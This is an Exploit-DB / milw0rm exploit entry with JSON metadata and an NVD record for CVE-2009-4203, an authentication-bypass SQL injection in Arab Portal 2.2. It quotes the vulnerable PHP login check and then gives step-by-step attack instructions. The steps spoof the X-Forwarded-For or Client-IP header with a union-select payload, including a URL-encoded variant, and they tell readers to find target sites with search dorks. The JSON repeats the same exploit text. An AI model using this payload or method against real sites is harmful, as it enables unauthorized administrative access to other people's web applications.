Arab Portal 2.2 Auth Bypass Remote SQL Injection Vulnerability
2009-05-29T00:00:00
ID EDB-ID:8828 Type exploitdb Reporter sniper code Modified 2009-05-29T00:00:00
Description
Arab Portal 2.2 (Auth Bypass) Remote SQL Injection Vulnerability. CVE-2009-4203. Webapps exploit for php platform
# Script Name : Arab portal 2.2 Remote Auth SQL Bypass Vulnerabilitiy
# Script home : http://www.arab-portal.info/arabportal_22.zip
# Exploit risk level : High
# Found By : RoMaNcYxHaCkEr [RXH]
# Written By : Sniper Code [S.C.T - 443 ]
# Our home : WwW.Sec-Code.CoM [Security - Codes TeaM]
+======================================================================================================================+
# Introduction About Vulne :
the Control Panel Is Depending on Session In MySQL Also By Cookies But by Default it Is Session ...
See This Line 192 of this File [admin/aclass/admin_func.php]:
$result = $apt->query("SELECT sessIP from rafia_admin_sess where sessID='$sessID' and sessIP='$sessIP' and sess_TIME<'$expsess'");
When You Injected The Header To Get XPL SQL Injection By Simple Injected And Success The Login In This SQL Query
# Vulne Line 192 In File [admin/aclass/admin_func.php]: :
function is_login()
{
global $apt;
$sessID = $this->get_sessID();
$sessIP = $apt->ip;
$expsess = $apt->time + $this->expsess;
if($this->use_pre_ip == 1){$r_ip = explode('.',$sessIP); $sessIP = $r_ip[0].'.'.$r_ip[1].'.'.$r_ip[2];}
$result = $apt->query("SELECT sessIP from rafia_admin_sess where sessID='$sessID' and sessIP='$sessIP' and sess_TIME<'$expsess'");
if ($apt->dbnumrows($result) > 0)
{
$apt->query("update rafia_admin_sess set sess_TIME='".$apt->time."' where sessID='$sessID'");
return true;
}
else
{
return false;
}
}
we can exploit this . .
# and now the Exploit is:
-First : Install This Tool :
https://addons.mozilla.org/en-US/firefox/addon/5948
it is [ X-Forwarded-For Spoofer tool]
You Can Inject Also Client-ip Also Is Infected In Header
-second : find site by using dork : plz use your mind ^_^
ok now Go To Admincp e.g. :
http://localhost/arabportal_22/admin/
http://sniper code/path/admin/
Then Write This Code In Tool [from Firefox ===> Tools====> X-Forwarded-for Spoofer]
put this code :
'/**/union/**/select/**/0/*
And select Enable for tool . . .
Now Refresh Twice ..and you will be In admin Control Panel ^_^
I Am Tired For Written Exploit For This Bug ...
and You Can Code It,s . .
If You Have Problem With Magic_quat in php version Encode To URL Like This :
%27%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%30%2F%2A
and also you will be in admin control panel. . . .
+================================================================================================================+
# Solution :
Protect The Admin cp By using Firewall Or Change The Login Manner :)
thats it . . .
[+]
done by :sniper code and rxh . .
[+] Greetz to :
[»] The members in our home [ WwW.Sec-Code.CoM - - ]
[»] [Snake1095 - aLwHEeD - AlH7nOOtY - aB0-3tH4b T3rR0r - HXH - -]
[»][MN9 - S4S-T3rr0r!sT -G0D-F4Th3r- SnIpEr_h - Cyb3R-1sT - siana - jiko - -]
[+] [members of WwW.tryag.cc/cc - -]
-==========================================[ ViVa Crazy Coderz rxh - S.C.T ]====================================-
# milw0rm.com [2009-05-29]
{"id": "EDB-ID:8828", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Arab Portal 2.2 Auth Bypass Remote SQL Injection Vulnerability", "description": "Arab Portal 2.2 (Auth Bypass) Remote SQL Injection Vulnerability. CVE-2009-4203. Webapps exploit for php platform", "published": "2009-05-29T00:00:00", "modified": "2009-05-29T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/8828/", "reporter": "sniper code", "references": [], "cvelist": ["CVE-2009-4203"], "lastseen": "2016-02-01T08:16:04", "viewCount": 7, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2016-02-01T08:16:04", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-4203"]}], "modified": "2016-02-01T08:16:04", "rev": 2}, "vulnersScore": 7.4}, "sourceHref": "https://www.exploit-db.com/download/8828/", "sourceData": "# Script Name : Arab portal 2.2 Remote Auth SQL Bypass Vulnerabilitiy\n\n# Script home : http://www.arab-portal.info/arabportal_22.zip\n# Exploit risk level : High\n# Found By : RoMaNcYxHaCkEr [RXH] \n# Written By : Sniper Code [S.C.T - 443 ]\n# Our home : WwW.Sec-Code.CoM [Security - Codes TeaM] \n+======================================================================================================================+\n\n# Introduction About Vulne :\n\nthe Control Panel Is Depending on Session In MySQL Also By Cookies But by Default it Is Session ...\n\nSee This Line 192 of this File [admin/aclass/admin_func.php]:\n\n $result = $apt->query(\"SELECT sessIP from rafia_admin_sess where sessID='$sessID' and sessIP='$sessIP' and sess_TIME<'$expsess'\");\n\nWhen You Injected The Header To Get XPL SQL Injection By Simple Injected And Success The Login In This SQL Query\n\n# Vulne Line 192 In File [admin/aclass/admin_func.php]: :\n\nfunction is_login()\n {\n global $apt;\n \n $sessID = $this->get_sessID();\n $sessIP = $apt->ip;\n $expsess = $apt->time + $this->expsess;\n\n if($this->use_pre_ip == 1){$r_ip = explode('.',$sessIP); $sessIP = $r_ip[0].'.'.$r_ip[1].'.'.$r_ip[2];}\n\n $result = $apt->query(\"SELECT sessIP from rafia_admin_sess where sessID='$sessID' and sessIP='$sessIP' and sess_TIME<'$expsess'\");\n\n if ($apt->dbnumrows($result) > 0)\n {\n $apt->query(\"update rafia_admin_sess set sess_TIME='\".$apt->time.\"' where sessID='$sessID'\");\n return true;\n }\n else\n {\n return false;\n }\n }\n\nwe can exploit this . .\n\n# and now the Exploit is:\n\n-First : Install This Tool :\n\nhttps://addons.mozilla.org/en-US/firefox/addon/5948\n\nit is [ X-Forwarded-For Spoofer tool]\n\nYou Can Inject Also Client-ip Also Is Infected In Header\n\n-second : find site by using dork : plz use your mind ^_^\n\nok now Go To Admincp e.g. :\n\nhttp://localhost/arabportal_22/admin/\n\nhttp://sniper code/path/admin/\n\nThen Write This Code In Tool [from Firefox ===> Tools====> X-Forwarded-for Spoofer]\n\nput this code :\n'/**/union/**/select/**/0/*\n\nAnd select Enable for tool . . .\n\nNow Refresh Twice ..and you will be In admin Control Panel ^_^\n\nI Am Tired For Written Exploit For This Bug ...\n\nand You Can Code It,s . .\n\nIf You Have Problem With Magic_quat in php version Encode To URL Like This :\n\n%27%2F%2A%2A%2F%75%6E%69%6F%6E%2F%2A%2A%2F%73%65%6C%65%63%74%2F%2A%2A%2F%30%2F%2A\n\nand also you will be in admin control panel. . . .\n+================================================================================================================+\n\n# Solution :\n\nProtect The Admin cp By using Firewall Or Change The Login Manner :)\n\nthats it . . .\n\n[+]\ndone by :sniper code and rxh . .\n\n[+] Greetz to :\n\n [\u00c2\u00bb] The members in our home [ WwW.Sec-Code.CoM - - ]\n [\u00c2\u00bb] [Snake1095 - aLwHEeD - AlH7nOOtY - aB0-3tH4b T3rR0r - HXH - -]\n [\u00c2\u00bb][MN9 - S4S-T3rr0r!sT -G0D-F4Th3r- SnIpEr_h - Cyb3R-1sT - siana - jiko - -]\n [+] [members of WwW.tryag.cc/cc - -]\n\n\n\n-==========================================[ ViVa Crazy Coderz rxh - S.C.T ]====================================-\n\n# milw0rm.com [2009-05-29]\n", "osvdbidlist": ["54811"]}
{"cve": [{"lastseen": "2020-10-03T11:54:19", "description": "Multiple SQL injection vulnerabilities in admin/aclass/admin_func.php in Arab Portal 2.2 allow remote attackers to execute arbitrary SQL commands via the (1) X-Forwarded-For or (2) Client-IP HTTP header in a request to the default URI under admin/.", "edition": 3, "cvss3": {}, "published": "2009-12-04T19:30:00", "title": "CVE-2009-4203", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-4203"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:arabportal:arab_portal:2.2"], "id": "CVE-2009-4203", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4203", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:arabportal:arab_portal:2.2:*:*:*:*:*:*:*"]}]}
